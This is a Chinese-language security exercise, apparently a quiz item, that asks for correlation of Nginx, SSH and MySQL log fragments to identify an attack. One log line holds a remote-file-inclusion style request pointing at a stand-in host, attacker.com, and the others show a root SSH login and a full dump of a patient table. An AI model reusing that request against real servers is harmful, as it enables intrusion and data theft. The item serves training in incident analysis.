某企业服务器同时产生 Nginx 访问日志、SSH 登录日志、MySQL 操作日志,以下是关键日志片段,请关联分析是否存在恶意攻击行为,若存在请指出攻击类型、攻击路径及证据:Nginx 访问日志192.168.5.123 - - [15/Jul/2024:10:20:30 +0800] "GET /fileManage.php?path=http://attacker.com/&file=malicious HTTP/1.1" 200 120
SSH 登录日志
Jul 15 10:25:00 server sshd[12345]: Accepted password for root from 192.168.5.123 port 56789 ssh2
MySQL 操作日志
Jul 15 10:30:00 server mysql[67890]: Query: SELECT * FROM patient_info WHERE id_card LIKE '%'
收藏
